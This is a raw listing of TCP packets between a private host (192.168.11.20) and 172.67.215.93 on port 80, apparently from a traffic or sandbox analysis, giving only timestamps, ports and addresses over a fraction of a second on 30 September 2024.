Sep 30, 2024 15:10:14.140646935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.140660048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.141000032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.141141891 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.141282082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.141298056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.141359091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.141415119 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.141428947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.141442060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.141482115 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.141482115 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.141700029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.141700029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.142268896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.142321110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.142343998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.142365932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.142558098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.142558098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.143043995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.143085003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.143100023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.143141031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.143362999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.143362999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.143949032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.143996954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.144013882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.144059896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.144515991 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.144515991 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.144836903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.144853115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.144866943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.144952059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.145359039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.145359039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.145576954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.145664930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.145715952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.145813942 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.146413088 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.146424055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.146424055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.251974106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.252140999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.252338886 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.252355099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.252437115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.252450943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.252626896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.252626896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.254554033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.254569054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.254622936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.254843950 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.254843950 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.254884005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.254940987 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.254954100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.254966021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.255033016 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.255223989 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.256052971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.256098032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.256112099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.256146908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.256272078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.256308079 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.256491899 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.256679058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.256709099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.256774902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.256828070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.256851912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.256901026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.257071018 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.257759094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.257774115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.257834911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.257888079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.258048058 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.258580923 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.258580923 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.258747101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.258799076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.258838892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.258852005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.259433031 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.259433031 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.259514093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.259526968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.259635925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.259654045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.259989023 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.260020018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.260199070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.260282993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.260309935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.260656118 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.260656118 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.260656118 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.260888100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.260996103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.261079073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.261092901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.261589050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.261589050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.262028933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.262058020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.262087107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.262103081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.262578964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.262749910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.262764931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.262778044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.262897015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.263422966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.263513088 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.263515949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.263617039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.263632059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.263689041 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.264050007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.264511108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.264539003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.264550924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.264652014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.264858007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.264858007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.265039921 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.265250921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.265335083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.265611887 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.265611887 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.265634060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.265665054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.266017914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.266350031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.266395092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.266700983 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.266880989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.266897917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.267364025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.267532110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.267604113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.267646074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.267661095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.267772913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.267879009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.268001080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.268014908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.268017054 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.268131018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.268143892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.268188000 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.268188000 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.268357038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.268526077 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.268724918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.268769979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.268835068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.268867016 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.268889904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.269134998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.269134998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.269685030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.269784927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.269834995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.269906998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.269998074 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.270046949 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.270216942 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.270564079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.270613909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.270627022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.270638943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.270714045 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.270978928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.270978928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.271455050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.271486998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.271719933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.271771908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.271776915 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.271840096 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.271895885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.271945953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.271995068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.272165060 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.272519112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.272625923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.272690058 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.272711039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.272726059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.272871971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.273041964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.273463011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.273571968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.273578882 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.273623943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.273638964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.274199009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.274199009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.274868011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.274914980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.274970055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.275027037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.275226116 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.275227070 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.275547028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.275571108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.275649071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.275669098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.275779963 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.275779963 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.275979042 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.277630091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.277663946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.277793884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.277829885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.277898073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.277898073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.278072119 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.278381109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.278481960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.278496027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.278537989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.278569937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.278973103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.279536963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.279606104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.279697895 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.279792070 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.279829025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.279840946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.279851913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.279864073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.279922009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.279932976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.280010939 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.280230045 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.280502081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.280551910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.280637026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.280807018 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.354816914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.354882956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.354988098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.355019093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.355031967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.355142117 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.355257988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.355273008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.355285883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.355294943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.355339050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.355339050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.355557919 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.355557919 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.355892897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.355986118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.356043100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.356053114 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.356168985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.356221914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.356221914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.356390953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.356729984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.356779099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.356843948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.356857061 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.356899977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.357027054 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.357197046 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.357624054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.357661009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.357878923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.357911110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.358155966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.358350992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.361455917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.361490011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.361511946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.361639977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.361787081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.361943960 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.361943960 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.362530947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.362620115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.362724066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.362747908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.362889051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.362909079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.362930059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.362966061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363023043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363122940 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.363122940 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.363131046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363256931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363276958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363296032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363296986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.363315105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363342047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363471985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363491058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363725901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363775969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363795042 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363812923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.363840103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.363840103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.363840103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.363840103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.363840103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.364037991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.364069939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.364089966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.364120007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.364139080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.364191055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.364191055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.364635944 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.364682913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.364748955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.364801884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.364916086 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.364928007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.365106106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.365394115 CEST	80	49754	172.67.215.93	192.168.11.20
